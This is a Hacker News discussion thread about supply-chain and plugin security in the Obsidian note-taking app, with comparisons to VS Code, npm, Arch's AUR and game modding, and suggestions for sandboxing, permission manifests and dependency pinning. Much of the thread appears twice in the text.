This is one way to look at it, but ignores the fact that most users use third party community plugins.
Obsidian has a truly terrible security model for plugins. As I realized while building my own, Obsidian plugins have full, unrestricted access to all files in the vault.
Obsidian could've instead opted to be more 'batteries-included', at the cost of more development effort, but instead leaves this to the community, which in turn increases the attack surface significantly.
Or it could have a browser extension like manifest that declares all permissions used by the plugin, where attempting to access a permission that's not granted gets blocked.
Both of these approaches would've led to more real security to end users than "we have few third party dependencies".
When I was young there were a few luminaries in the software world who talked about how there is a steady if small flow of ideas from video game design into conventional software.
But I haven't heard anyone talk like that in quite sometime (unless it's me parroting them). Which is quite unfortunate.
I think for example if someone from the old guard of Blizzard were to write a book or at least a novella that described how the plugin system for World of Warcraft functioned, particularly during the first ten years, where it broke, how they hardened it over time, and how the process worked of backporting features from plugins into the core library...
I think that would be a substantial net benefit to the greater software community.
Far too many ecosystems make ham-fisted, half-assed, hair-brained plugin systems. And the vast majority can be consistently described by at least two of the three.
I came to learn that even though in process plugins are easier to implement, and less resource demanding, anyone serious about host stability and security can only allow for plugins based on OS IPC.
And in general, it will take less hardware resources that the usual Electron stuff.
Kernel design is (to me) another one where ideas have flowed into other software fields - there were monolithic kernels, micro kernels, and hybrid kernels, and they all need to work with third party modules (drivers)
The lessons from all fields seem to be relearnt again and again in new fields :-)
Because learning how to make a proper one requires building your own broken one first.
It might be slightly sped up by reading up on theory and past experiences of others.
I am around mid life and I see how I can tell people stuff, I can point people to resources but they still won’t learn until they hit the problem themselves and put their mind into figuring it out.
I have been using firejail for most of these kind of applications, be it Obsidian, Discord, or the browser I am using. I definitely recommend people start using it.
If you're using a flatpak, that's not actually the case. It would have very restricted access to the point where you even would have to explicitly give it access to user /home.
I'm not claiming it's a security feature of Obsidian, I'm saying it's a consequence of running a flatpak - and in this situation it could be advantageous for those interested.
Having recently read through a handful of issues on their forums, they seems to brush aside a lot of things. It's a useful tool but the mod / dev team they have working with the community could use some training.
I think it's a matter of time until we see a notable plugin in the obsidian space get caught exfiltrating data. I imagine then, after significant reputational harm, the team will start introducing safe guards. At a minimum, create some sort of verified publisher system.
Funny enough, I thought this earlier about Arch Linux and it's deritives. It was mentioned on reddit that they operate on a small budget. A maintainer replied that they have very low overhead, and the first thought that popped into my mind was that most of the software I use and rely on comes from the AUR, which relies on the user to manage their own security.
If engineers can't even manage their own security, why are we expecting users to do so?
I think this criticism is unfair because most common packages are covered by the core and extra repos which are maintained by Arch Linux. AUR is a collection of user build scripts and using it has a certain skill cliff such that I expect most users to have explicit knowledge of the security dangers. I understand your concern but it would be weird and out of scope for Arch to maintain or moderate AUR when what Arch is providing here amounts to little more than hosting. Instead Arch rightly gives the users tools to moderate it themselves through the votes and comments features. Also the most popular AUR packages are maintained by well known maintainers.
The derivatives are obviously completely separate from Arch and thus are not the responsibility of Arch maintainers.
Disagree. AUR isn’t any trickier than using pacman most of the time. Install a package manager like Yay or Paru and you basically use it the same way as the default package manager.
It’s still the same problem, relying on the community and trusted popular plugin developers to maintain their own security effectively.
I understood GP's point to be that because Obsidian leaves a lot of functionality to plugins, most people are going to use unverified third party plugins. On arch however most packages are in core or extra so for most people they wont need to go to AUR. They are more likely to install the flatpak or get the appimage for apps not in the repos as thats much easier.
yay or paru (or other aur helpers afaik) are not in the repos. To install them one needs to know about how to use AUR in the first place. If you are technically enough to do that, you should know about the security risks since almost all tutorials for AUR come with the security warnings. Its also inconvenient enough that most people wont bother.
In obsidian plugins can seem central to the experience so users might not think much of installing them, in Arch AUR is very much a non essential component. At least thats how I understand it.
> If engineers can't even manage their own security, why are we expecting users to do so?
This latest attack hit Crowdstrike as well. Imagine they had gotten inside Huntress, who opened up about how much they can abuse the access given: https://news.ycombinator.com/item?id=45183589
Security folks and companies think they are important. The C suite sees them as a scape goat WHEN the shit hits the fan and most end users feel the same about security as they do about taking off their shoes at the airport (what is this nonsense for) and they mostly arent wrong.
It's not that engineers cant take care of their own security. It's that we have made it a fight with an octopus rather than something that is seamless and second nature. Furthermore security and privacy go hand and hand... Teaching users that is not to the benefit of a large portion of our industry.
> It's not that engineers cant take care of their own security.
I dunno. My computer has at least 1 hardware backdoor that I know off, but that I just can't get hardware without any equivalent exploit.
My OS is developed with a set of tools that is known to make code revision about as hard as possible. Provides the bare minimum application insulation. And is 2 orders of magnitude larger than any single person can read on their lifetime. It's also the usable OS out there with best security guarantees, everything else is much worse or useless.
A browser is almost a new complete layer above the OS. And it's 10 times larger. Also written in a way that famously makes revisions impossible.
And then there are the applications, that is what everybody is focusing today. Keeping them secure is close to useless if one don't fix all of the above.
I'm developing an Obsidian plugin commercially. I wish there was a higher tier of vetting available to a certain grade of plugin.
IMO they should do something like aur on Arch Linux and have a community managed plugin repo and then a smaller, more vetted one. That would help with the plugin review time too.
The plugin is called Relay [0] -- it makes Obsidian more useful in a work setting by adding real-time collaboration.
One thing that makes our offering unique is the ability to self-host your Relay Server so that your docs are completely private (we can't read them). At the same time you can use our global identity system / control plane to collaborate with anyone in the world.
We have pretty solid growth, a healthy paid consumer base (a lot of students and D&D/TTRPG), and starting to get more traction with businesses and enterprise.
It's no worse than vscode. Sure there's permissions, but it's super common for an extension to start a process and that process can do anything it wants.
Plus vscode is maintained by a company with thousands of devs. Obsidian is less than 10 people, which is amazing. About plugins why blame the product, pls check what you install on your machine instead
Don’t most plugin models work this way? Does VSCode, Vim, Emacs, and friends do anything to segregate content? Gaming is the only area where I expect plugins have limited permissions.
Browser extensions also have a relatively robust permissions-based system.
If they wanted to, one would guess that browser-ish local apps based on stuff like Electron/node-webkit could probably figure out some way to limit extension permissions more granularly.
I would have thought, but it has been how many years, and as far as I know, there is still no segregation for VSCode extensions. Microsoft has all the money and if they cannot be bothered, not encouraged that smaller applications will be able to iron out the details.
I think it's just because supply-chain attacks are not common enough / their attack surfaces not large enough to be worth the dev time... yet...
Sneak in a malicious browser extension that breaks the permissions sandbox, and you have hundreds of thousands to millions of users as an attack surface.
Make a malicious VSCode/IDE extension and maybe you hit some hundreds or thousands of devs, a couple of smaller companies, and probably can get on some infosec blogs...
The time has come. The nx supply chain attack a couple weeks ago literally exfiltrated admin tokens from your local dev machine because the VS code extension for nx always downloaded the latest version of nx from npm. And since nx is a monoreop tool, it’s more applicable to larger projects with more valuable tokens to steal.
The solution at my job is you can only install extensions vetted by IT and updates are significantly delayed. Works well enough but sucks if you want one that isn't available inside the firewall.
> The code in Mods for Cities: Skylines is not executed in a sandbox.
> While we trust the gaming community to know how to behave and not upload malicious mods that will intentionally cause damage to users, what is uploaded on the Workshop cannot be controlled.
> Like with any files acquired from the internet, caution is recommended when something looks very suspicious.
vim and emacs are over 30 years old and therefore living with an architecture created when most code was trusted. Encrypting network protocols was extremely rare, much less disks or secrets. I don't think anything about the security posture of vim and emacs should be emulated by modern software.
I would say VSCode has no excuse. It's based on a browser which does have capabilities to limit extensions. Huge miss on their part, and one that I wish drew more ire.
I'd love to see software adopt strong capabilities-based models that enforce boundaries even within parts of a program. That is, with the principle of least authority (POLA), code that you call is passed only the capabilities you wish (e.g. opening a file, or a network socket), and not everything that the current process has access to. Thomas Leonard's post (https://roscidus.com/blog/blog/2023/04/26/lambda-capabilitie...) covers this in great detail, and OCaml's newer Eio effect system will has aspects of this too.
The Emily language (locked-down subset of OCaml) was also interesting for actively removing parts of the standard library to get rid of the escape hatches that would enable bypassing the controls.
I was thinking more Lua/Luaua which make it trivial to restrict permissions. In general, the gaming client has access to a lot more information than it shares, so to prevent cheats from plugins, the developers have to be explicit about security boundaries.
Another thought: what about severely sandboxing plugins so they while they have access to your notes, they have no network or disk access and in general lack anyway for them to exfiltrate your sensitive info? Might not be practical but approaches like this appeal to me.
I use “Templater” and “Dataview” but now I am rethinking my usage; they were required for the daily template I use (found here on HN) but this is probably overkill.
This app deals with very critical, personal, and intimate data – personal notes and professional/work-related notes, but proudly has an Electron app. This alone has seemed like a massive red flag to me.
One of the large dependencies they call out is an excellent example: pdf.js.
There is no reason for pdf.js to ever access anything other than the files you wish to export. The Export to PDF process could spawn a containerized subprocess with 0 filesystem or network access and constrained cpu and memory limits. Files could sent to the Export process over stdin, and the resulting PDF could be streamed back over stdout with stderr used for logging.
There are lots of plugin systems that work this way. I wish it were commodofied and universally available. AFAIK there's very little cross-platform tooling to help you solve this problem easily, and that's a pity.
Operating systems are different though, since their whole purpose is to host _other_ applications.
FWIW, MacOS isn't any better or worse for security than any other desktop OS tbh....
I mean, MacOS just had it's "UAC" rollout not that long ago... and not sure about you, but I've encountered many times where someone had to hang up a Zoom or browser call because they updated the app or OS, and had to re-grant screenshare permissions or something. So, not that different. (Pre-"UAC" versions of MacOS didn't do any sandboxing when it came to user files / device access)
Yes, you are responsible for all the code you ship to your users. Not pinning dependencies is asking for trouble. It is literally, "download random code from the Internet and hope for the best."
Pinning dependencies also means you're missing any security fixes that come in after your pinned versions. That's asking for trouble too, so you need a mechanism by which you become aware of these fixes and either backport them or upgrade to versions containing them.
Things like dependabot or renovate solves the problem of letting you know when security updates are available, letting you have your cake and eat it too.
This statement is one of those useless exercises in pedantry like when people say "well technically coffee is a drug too, so..."
Code with publicly-known weaknesses poses exponentially more danger than code with unknown weaknesses.
It's like telling sysadmins to not waste time installing security patches because there are likely still vulnerabilities in the application. Great way to get n-day'd into a ransomware payment.
Have you spent time reviewing the security patches for any nontrivial application recently? 90% of them are worthless, the 10% that are actually useful are pretty easy to spot. It's not as big of a deal as people would like to have you think.
The real answer is to minimize dependencies (and subdependencies) to the greatest extent practical. In some cases you can get by with surprisingly few without too much pain (and in the long run, maybe less pain than if you'd pulled in more).
Yep, and for the rest I've gotten a lot of mileage, when shipping server apps, by deploying on Debian or Ubuntu* and trying to limit my dependencies to those shipped by the distro (not snap). The distro security team worries about keeping my dependencies patched and I'm not forced to take new versions until I have to upgrade to the next OS version, which could be quite a long time.
It's a great way to keep lifecycle costs down and devops QoL up, especially for smaller shops.
*Insert favorite distro here that backports security fixes to stable package versions for a long period of time.
No. "Always downloading random code and hoping" is not the only option. Even w/ the supply-chain shitshow that the public npmjs registry has become, using pnpm and a private registry makes it possible to leverage a frozen lockfile that represents the entire dependency graph and supports vulnerability-free reproducible builds.
EDIT to add:
Of course, reaching a state where the whole graph is free of CVEs is a fleeting state of affairs. Staying reasonably up-to-date and using only scanned dependencies is an ongoing process that takes more effort and attention to detail than many projects are willing or able to apply; but it is possible.
> We do not run postinstall scripts. This prevents packages from executing arbitrary code during installation.
I get the intent, but I’m not sure this really buys much. If a package is compromised, the whole thing is already untrustworthy and skipping postinstall doesn’t suddenly make the rest of the code safe. If it isn’t compromised, then you risk breaking legitimate installation steps.
From a security perspective, it feels like an odd tradeoff. I don’t have hard data, but I’d wager we see far more vulnerabilities patched through regular updates than actual supply-chain compromises. Delaying or blocking updates in general tends to increase your exposure rather than reduce it.
There’s some advice that’s been going around lately that I’ve been having trouble understanding: the idea that you should not be updating your dependencies when new patches are released (e.g., X.X.PATCH).
I understand that not updating your dependencies when new patches are released reduces the chance of accidentally installing malware, but aren’t patches regularly released in order to improve security? Wouldn’t it generally be considered unwise to not install new patches?
There's a key missing piece to this puzzle: being informed about _why_ you're updating and what the patches are.
Nobody has time to read source code, but there are many tools and services that will tell you brief summaries of release notes. Npm Audit lists security vulnerabilities in your package versions for example.
I do adopt the strategy of not updating unless required, as updates are not only an attack vector, but also an extremely common source of bugs that'd I'd prefer to avoid.
But importantly I stay in the loop about what exploits I'm vulnerable to. Packages are popping up with vulnerabilities constantly, but if it's a ReDoS vulnerability in part of the package I definitely don't use or pass user input to? I'm happy to leave that alone with a notice. If it's something I'm worried another package might use unsafely, with knowledge of the vulnerability I can decide how important it is, and if I need to update immediately, or if I can (preferably) wait some time for the patch to cook in the wild.
That is the important thing to remember about security in this context: it is an active, continuous, process. It's something that needs to be tuned to the risk tolerance and risk appetite of your organisation, rather than a blanket "never update" or "always update" - for a well-formed security stance, one needs more information than that.
Exactly. If you can avoid having to do _any_ patches except those that have a security purpose you've already reduced your risk to supply chain attacks considerably.
This isn't trivial to organise though since semver by it's self doesn't denote when a patch is security related or not. Of course, you can always review the release notes but this is time consuming, and doesn't scale well when a product grows either in size of code base or community support.
This is where there's a fairly natural place for SAST (E.g., Semgrep, Snyk (many more but these are the two I've used the most, in no particular order)), and supply chain scans fall in place, but they're prohibitively expensive.
There is a lot of open source tooling out there that can achieve the same too of course.
I've found there's a considerable linear climb with overheads/TOIL and the larger the number of open source tools you commit to create a security baseline. Unfortunately, this realistically means most companies where time is scarcer than money, means more money shifts into closed source products like those I listed, rather than those ran by open source products/companies.
I believe it's about waiting a bit before a new patch is released, not fully avoiding installing updates. Seems like compromises are being caught quickly these days, usually within hours. There are multiple companies monitoring npm package releases because they sell security scanning products and so it's part of their business to be on top of it.
pnpm has a setting that you can tell it that a package needs to be at least X minutes old in order to install it. I would wait at least 24 hours just to be safe
To be honest, right now I'm thinking about isolating of build process for frontend on my local environment. It is seems not hard to send my local environment variables like OPENAI_API_KEY or .ssh/* to some remote machine.
I know it is not very different comparing to python or projects in any other language. But I don't feel that I cannot trust node/js community at this point.
I’ve been using other apps than Obsidian for notes and sharing, so this is nice to read and consider. But isn’t Obsidian an electron app or whatever? Electron has always seemed resource intensive and not native. JavaScript has never struck me as “secure”. Am I just out of touch?
JavaScript is a very secure language. The browser is a massive success at running secure JavaScript on a global scale. Every website you use is running JavaScript and not able to read other site data. Electron is the same, running v8 to sandbox JavaScript. Assuming you aren't executing user input inside that sandbox (something many programming languages allow, including JS), it's very secure.
The problem with supply chain attacks is specifically related to npm, and not related to JS. npm as an organization needs to be taking more responsibility for the recent attacks and essentially forcing everyone to use more strict security controls when publishing their dependencies.
Doesn’t this mean browser sandboxing is secure, not JS? Or are you referring to some specific aspect of JS I’m not aware of? (I’m not aware of a lot of JS)
It’s maybe a nit-pick, since most JS is run sandboxed, so it’s sort of equivalent. But it was explicitly what GP asked for. Would it be more accurate to say Electron is secure, not JS?
I mean, JavaScript doesn’t even have APIs for reading a file from disk, let alone executing an arbitrary binary. (Anything similar comes from a runtime like NodeJS.) You can’t access memory in different JS processes… so what would make it insecure?
To be fair, a plugin system built on JS with all plugins interacting in the same JS context as the main app has some big risks. Anything plugin can change definitions and variable in the global scope with some restrictions. But any language where you execute untrusted code in the same context/memory/etc as trusted code has risks. the only solution is sandboxing plugins
Turing completeness is irrelevant, as it only addresses computation. Security has to do with system access, not computational capacity. Brainfuck is Turing complete, but lacks any primitives to do more than read from a single input stream and write to a single output stream. Unless someone hooks those streams up to critical files, you can't use it to attack a system.
Language design actually has a lot of impact on security, because it defines what primitives you have available for interacting with the system. Do you have an arbitrary syscall primitive? Then the language is not going to help you write secure software. Is your only ability to interact with the system via capability objects that must be provided externally to authorize your access? Then you're probably using a language that put a lot of thought into security and will help out quite a lot.
A number of operating system security features, such as ASLR, exist because low level languages allow reading and writing memory that they didn't create.
Conversely, barring a bug in the runtime or compiler, higher level languages don't enable those kinds of shenanigans.
See for example the heart bleed bug, where openssl would read memory it didn't own when given a properly malformed request.
Not a huge electron fan (thank god for tauri), but Obsidian is a fantastic app and you shouldn't let the electron put you off of it. You can even hook a MCP up to it and an agent can use it as a personal knowledge base, it's quite handy.
These practices are very similar to what I've done in the past, for a large, sensitive system, and they worked very well.
(IIUC, we actually were the first to get a certain certification for cloud deployment, maybe because we had a good handle on this and other factors.)
From the language-specific network package manager, I pulled the small number of third-party packages we used into the filesystem tree of system's repo, and audited each new version. And I disabled the network package manager in the development and deployment environments, to make it much harder for people to add in dependencies accidentally.
Dependencies outside this were either from the Linux distro (nice, because well-managed security updates), or go in the `vendor` or `ots` (off-the-shelf) trees of the repo (and are monitored for security updates).
Though, I look at some of the Python, JS, or Rust dependency explosions I sometimes see -- all dependent on being hooked up to the language's network package manager, with many people adding these cavalierly -- and it becomes a much harder problem.
If the obsidian team did a 2 hour q&a livestream every week, I'd watch every one (or at least get the AI summary). One of my favorite pieces of software ever.
Going to preface this post by saying I use and love Obsidian, my entire life is effectively in an Obsidian vault, I pay for sync and as a user I'm extremely happy with it.
But as a developer this post is nonsense and extremely predictable [1]. We can expect countless others like it that explains how their use of these broken tools is different and just don't worry about it!
By their own linked Credits page there are 20 dependencies. Let's take one of those, electron, which itself has 3 dependencies according to npm. Picking one of those electron/get has 7 dependencies. One of those dependencies got, has 11 dependencies, one of those cacheable-request has 7 dependencies etc etc.
Now go back and pick another direct dependency of Obsidian and work your way down the dependency tree again. Does the Obsidian team review all these and who owns them? Do they trust each layer of the chain to pick up issues before it gets to them? Any one of these dependencies can be compromised. This is what it means to be. supply chain attack, you only have to quietly slip something into any one of these dependencies to have access to countless critical user data.
To be fair, the electron project likely invests some resources in reviewing it's own dependencies, because of its scale. But yeah this is a good exercise, I think we need more systems like Yocto which prioritize complete understanding of the entire product from source.
Coincidentally I did that yesterday. Mermaid pulls in 137 dependencies. I love Obsidian and the Obsidian folks seem like good people but I did end up sandboxing it.
This is obviously the way to do it, assuming you have the skills and resources to operate in this manner. If you don't, then godspeed, but you have to know going in that you are trading expediency now for risk later. Risk of performance issues, security vulnerabilities, changes in behavior, etc. And when the mess inevitably comes, at whatever inopportune time, you don't really get to blame other people...
I installed an AppArmor profile for Obsidian. For an application that displays text files, it needed a lot of permissions. It would refuse to run without network access.
You can install Obsidian flatpak and lock it down with flatseal.
Was hoping they outlined their approach to handling potentially compromised packages running on dev machines prior to even shipping. That seems like a much harder problem to solve.
Can’t wait for “implements mechanism to delay application of new patches” to start showing up compliance checklists. My procrastination will finally pay off!
I love Obsidian dearly, but if you build an app that's only really useful with plugins, and that has a horrifyingly bad security model for plugins and little to no assurance of integrity of the plugins...
Maybe, just maybe, don't give fullmouthed advice on reducing risk in the supply chain.
'It may sound obvious but the
primary way we reduce the risk of
supply chain attacks is to avoid depending on third-party code."
What a horribly disingenuous statement, for a product that isn't remotely usable without 3rd-party plugins. The "Obsidian" product would be more aptly named "Mass Data Exfiltration Facilitator Pro".
I have to agree that I don't find plugins necessary, and I'm not sure why you're so down on people using a solid backlinking note taker. I don't think I have low standards, I think Roam and Logseq aren't that great and Obsidian is all I need.
Absolutely love Obsidian but had to stop using it because Electron apps don't play well with Wayland. After lots of tinkering around with flags and settings for compatibility layers, it became obvious that it would never work seamlessly like it did on Windows (and probably does on x11). So it was either give up Wayland compositors or give up Obsidian. Luckily I don't use any plugins, so moving to other software was easy, but I still would prefer Obsidian. Electron's "works everywhere" works about as good as Java's "works everywhere", which is to say it works great, until it doesn't, at which point it's a mess of tinkering.
If you use Wayland and it works for you, that's great, but it's not my experience.
In my experience electron + Wayland was absolutely god awful for a long time, but it got dramatically better in the last 4-5ish months. So depending on when you last tried it, might be worth a revisit. Heavily depends on which GPU+DE though, Nvidia+Plasma here.
but still along the same lines as "safer". the stresses are different, "safer" has the stress as "SAY-fer" and "secure" has the stress as "sih-KYOOR". the latter sounds more similar (and rhymes better) with "more", the originator of the phrase "less is more"
This doesn't make any sense to me. I've always been told you don't write anything yourself unless you absolutely have to and having a million micro-dependencies is a good thing. JavaScript and now Rust devs have been saying this for years. Surely they know what they're doing...
There is a balance to be struck. NPM in particular has been a veritable dependency hell for a long time. I don't know if it just attracts inexperienced developers, or if its security model is fundamentally flawed, but there have been soooo many supply chain attacks using NPM that being extra careful is very much warranted.
This is one way to look at it, but ignores the fact that most users use third party community plugins.
Obsidian has a truly terrible security model for plugins. As I realized while building my own, Obsidian plugins have full, unrestricted access to all files in the vault.
Obsidian could've instead opted to be more 'batteries-included', at the cost of more development effort, but instead leaves this to the community, which in turn increases the attack surface significantly.
Or it could have a browser extension like manifest that declares all permissions used by the plugin, where attempting to access a permission that's not granted gets blocked.
Both of these approaches would've led to more real security to end users than "we have few third party dependencies".
When I was young there were a few luminaries in the software world who talked about how there is a steady if small flow of ideas from video game design into conventional software.
But I haven't heard anyone talk like that in quite sometime (unless it's me parroting them). Which is quite unfortunate.
I think for example if someone from the old guard of Blizzard were to write a book or at least a novella that described how the plugin system for World of Warcraft functioned, particularly during the first ten years, where it broke, how they hardened it over time, and how the process worked of backporting features from plugins into the core library...
I think that would be a substantial net benefit to the greater software community.
Far too many ecosystems make ham-fisted, half-assed, hair-brained plugin systems. And the vast majority can be consistently described by at least two of the three.
I came to learn that even though in process plugins are easier to implement, and less resource demanding, anyone serious about host stability and security can only allow for plugins based on OS IPC.
And in general, it will take less hardware resources that the usual Electron stuff.
I’ve been of the opinion that every hard problem in CS shows up somewhere in gamedev. It’s a great space for inspo.
Kernel design is (to me) another one where ideas have flowed into other software fields - there were monolithic kernels, micro kernels, and hybrid kernels, and they all need to work with third party modules (drivers)
The lessons from all fields seem to be relearnt again and again in new fields :-)
Because learning how to make a proper one requires building your own broken one first.
It might be slightly sped up by reading up on theory and past experiences of others.
I am around mid life and I see how I can tell people stuff, I can point people to resources but they still won’t learn until they hit the problem themselves and put their mind into figuring it out.
> Obsidian plugins have full, unrestricted access to all files in the vault.
Unless something has changed, it's worse than that. Plugins have unrestricted access to any file on your machine.
When I brought this up in discord a while back they brushed it aside.
What if you run little snitch and block any communications from obsidian to anything?
Or firejail. Or QubesOS using a dedicated VM. There are options, but it would still be nice if Obsidian had a more robust security model.
I have been using firejail for most of these kind of applications, be it Obsidian, Discord, or the browser I am using. I definitely recommend people start using it.
Sell it to us! Why do you use specifically firejail?
There are so many options, from so many different security perspectives, that analysis paralysis is a real issue.
Little snitch can block open(2)?
I believe they're saying it can open, it just can't send the data anywhere.
Seems a little excessive, but here we are.
If you're using a flatpak, that's not actually the case. It would have very restricted access to the point where you even would have to explicitly give it access to user /home.
So if I run their software in a container they can't access my entire filesystem. I don't think that is a security feature.
It sounds like if I ever run obsidian I should be using flat seal too.
Er, what?
I'm not claiming it's a security feature of Obsidian, I'm saying it's a consequence of running a flatpak - and in this situation it could be advantageous for those interested.
Having recently read through a handful of issues on their forums, they seems to brush aside a lot of things. It's a useful tool but the mod / dev team they have working with the community could use some training.
To be fair, it’s no worse of a dumpsterfire than any other plug-in ecosystem.
I think it's a matter of time until we see a notable plugin in the obsidian space get caught exfiltrating data. I imagine then, after significant reputational harm, the team will start introducing safe guards. At a minimum, create some sort of verified publisher system.
Funny enough, I thought this earlier about Arch Linux and it's deritives. It was mentioned on reddit that they operate on a small budget. A maintainer replied that they have very low overhead, and the first thought that popped into my mind was that most of the software I use and rely on comes from the AUR, which relies on the user to manage their own security.
If engineers can't even manage their own security, why are we expecting users to do so?
I think this criticism is unfair because most common packages are covered by the core and extra repos which are maintained by Arch Linux. AUR is a collection of user build scripts and using it has a certain skill cliff such that I expect most users to have explicit knowledge of the security dangers. I understand your concern but it would be weird and out of scope for Arch to maintain or moderate AUR when what Arch is providing here amounts to little more than hosting. Instead Arch rightly gives the users tools to moderate it themselves through the votes and comments features. Also the most popular AUR packages are maintained by well known maintainers.
The derivatives are obviously completely separate from Arch and thus are not the responsibility of Arch maintainers.
Disagree. AUR isn’t any trickier than using pacman most of the time. Install a package manager like Yay or Paru and you basically use it the same way as the default package manager.
It’s still the same problem, relying on the community and trusted popular plugin developers to maintain their own security effectively.
I understood GP's point to be that because Obsidian leaves a lot of functionality to plugins, most people are going to use unverified third party plugins. On arch however most packages are in core or extra so for most people they wont need to go to AUR. They are more likely to install the flatpak or get the appimage for apps not in the repos as thats much easier.
yay or paru (or other aur helpers afaik) are not in the repos. To install them one needs to know about how to use AUR in the first place. If you are technically enough to do that, you should know about the security risks since almost all tutorials for AUR come with the security warnings. Its also inconvenient enough that most people wont bother.
In obsidian plugins can seem central to the experience so users might not think much of installing them, in Arch AUR is very much a non essential component. At least thats how I understand it.
> If engineers can't even manage their own security, why are we expecting users to do so?
This latest attack hit Crowdstrike as well. Imagine they had gotten inside Huntress, who opened up about how much they can abuse the access given: https://news.ycombinator.com/item?id=45183589
Security folks and companies think they are important. The C suite sees them as a scape goat WHEN the shit hits the fan and most end users feel the same about security as they do about taking off their shoes at the airport (what is this nonsense for) and they mostly arent wrong.
It's not that engineers cant take care of their own security. It's that we have made it a fight with an octopus rather than something that is seamless and second nature. Furthermore security and privacy go hand and hand... Teaching users that is not to the benefit of a large portion of our industry.
> It's not that engineers cant take care of their own security.
I dunno. My computer has at least 1 hardware backdoor that I know off, but that I just can't get hardware without any equivalent exploit.
My OS is developed with a set of tools that is known to make code revision about as hard as possible. Provides the bare minimum application insulation. And is 2 orders of magnitude larger than any single person can read on their lifetime. It's also the usable OS out there with best security guarantees, everything else is much worse or useless.
A browser is almost a new complete layer above the OS. And it's 10 times larger. Also written in a way that famously makes revisions impossible.
And then there are the applications, that is what everybody is focusing today. Keeping them secure is close to useless if one don't fix all of the above.
You never actually told us what your OS is.
Because that would be a distraction to the point they're actually making.
They must mean macos, right?
I'm developing an Obsidian plugin commercially. I wish there was a higher tier of vetting available to a certain grade of plugin.
IMO they should do something like aur on Arch Linux and have a community managed plugin repo and then a smaller, more vetted one. That would help with the plugin review time too.
Just out of curiosity, what's the plugin? Are there folks interested in paying for plugins?
The plugin is called Relay [0] -- it makes Obsidian more useful in a work setting by adding real-time collaboration.
One thing that makes our offering unique is the ability to self-host your Relay Server so that your docs are completely private (we can't read them). At the same time you can use our global identity system / control plane to collaborate with anyone in the world.
We have pretty solid growth, a healthy paid consumer base (a lot of students and D&D/TTRPG), and starting to get more traction with businesses and enterprise.
[0] https://relay.md
Are you worried about being sherlocked at all? I know "multiplayer" is on their official roadmap.
yeah, definitely.
It might not be the most strategic move, but i want to build cool and useful tools, and the Obsidian folks are a big inspiration.
I hope there's a way to collaborate and/or coexist.
This open letter seems relevant here: https://www.emilebangma.com/Writings/Blog/An-open-letter-to-...
It's no worse than vscode. Sure there's permissions, but it's super common for an extension to start a process and that process can do anything it wants.
It's *significantly* worse than vscode. vscode is at least attempting to grapple the problem: https://code.visualstudio.com/docs/configure/extensions/exte....
And why is VSCode our baseline?
Plus vscode is maintained by a company with thousands of devs. Obsidian is less than 10 people, which is amazing. About plugins why blame the product, pls check what you install on your machine instead
Don’t most plugin models work this way? Does VSCode, Vim, Emacs, and friends do anything to segregate content? Gaming is the only area where I expect plugins have limited permissions.
Browser extensions also have a relatively robust permissions-based system.
If they wanted to, one would guess that browser-ish local apps based on stuff like Electron/node-webkit could probably figure out some way to limit extension permissions more granularly.
I would have thought, but it has been how many years, and as far as I know, there is still no segregation for VSCode extensions. Microsoft has all the money and if they cannot be bothered, not encouraged that smaller applications will be able to iron out the details.
I think it's just because supply-chain attacks are not common enough / their attack surfaces not large enough to be worth the dev time... yet...
Sneak in a malicious browser extension that breaks the permissions sandbox, and you have hundreds of thousands to millions of users as an attack surface.
Make a malicious VSCode/IDE extension and maybe you hit some hundreds or thousands of devs, a couple of smaller companies, and probably can get on some infosec blogs...
The time has come. The nx supply chain attack a couple weeks ago literally exfiltrated admin tokens from your local dev machine because the VS code extension for nx always downloaded the latest version of nx from npm. And since nx is a monoreop tool, it’s more applicable to larger projects with more valuable tokens to steal.
The solution at my job is you can only install extensions vetted by IT and updates are significantly delayed. Works well enough but sucks if you want one that isn't available inside the firewall.
> Gaming is the only area where I expect plugins have limited permissions.
It's pretty much the opposite. A lot of modding communities' security model is literally just to "trust the community."
Example: https://skylines.paradoxwikis.com/Modding_API
> The code in Mods for Cities: Skylines is not executed in a sandbox.
> While we trust the gaming community to know how to behave and not upload malicious mods that will intentionally cause damage to users, what is uploaded on the Workshop cannot be controlled.
> Like with any files acquired from the internet, caution is recommended when something looks very suspicious.
vim and emacs are over 30 years old and therefore living with an architecture created when most code was trusted. Encrypting network protocols was extremely rare, much less disks or secrets. I don't think anything about the security posture of vim and emacs should be emulated by modern software.
I would say VSCode has no excuse. It's based on a browser which does have capabilities to limit extensions. Huge miss on their part, and one that I wish drew more ire.
I'd love to see software adopt strong capabilities-based models that enforce boundaries even within parts of a program. That is, with the principle of least authority (POLA), code that you call is passed only the capabilities you wish (e.g. opening a file, or a network socket), and not everything that the current process has access to. Thomas Leonard's post (https://roscidus.com/blog/blog/2023/04/26/lambda-capabilitie...) covers this in great detail, and OCaml's newer Eio effect system will has aspects of this too.
The Emily language (locked-down subset of OCaml) was also interesting for actively removing parts of the standard library to get rid of the escape hatches that would enable bypassing the controls.
> Gaming is the only area where I expect plugins have limited permissions.
Do you mean mods on Steam? If you do, then that's down to the individual game. Sandboxing mods isn't universal.
I was thinking more Lua/Luaua which make it trivial to restrict permissions. In general, the gaming client has access to a lot more information than it shares, so to prevent cheats from plugins, the developers have to be explicit about security boundaries.
Perhaps, but I think what you might put onto Obsidian (personal thoughts, journal entries etc) can be more sensitive than code.
Another thought: what about severely sandboxing plugins so they while they have access to your notes, they have no network or disk access and in general lack anyway for them to exfiltrate your sensitive info? Might not be practical but approaches like this appeal to me.
Deno would be a good candidate for this.
That's ok. I haven't come across an Obsidian plug-in that's worth introducing a dependency for.
I use “Templater” and “Dataview” but now I am rethinking my usage; they were required for the daily template I use (found here on HN) but this is probably overkill.
I did too but have switched over to “bases” now that that’s in core. Before that I had an apparmor profile restricting Obsidian from reaching the web.
This app deals with very critical, personal, and intimate data – personal notes and professional/work-related notes, but proudly has an Electron app. This alone has seemed like a massive red flag to me.
> Obsidian plugins have full, unrestricted access to all files in the vault.
And how exactly you can solve that?
I don't want to press 'allow access' on the every file some plugin is accessing.
One of the large dependencies they call out is an excellent example: pdf.js.
There is no reason for pdf.js to ever access anything other than the files you wish to export. The Export to PDF process could spawn a containerized subprocess with 0 filesystem or network access and constrained cpu and memory limits. Files could sent to the Export process over stdin, and the resulting PDF could be streamed back over stdout with stderr used for logging.
There are lots of plugin systems that work this way. I wish it were commodofied and universally available. AFAIK there's very little cross-platform tooling to help you solve this problem easily, and that's a pity.
Specific permissions declared in a manifest much like browser extensions could be a good first step.
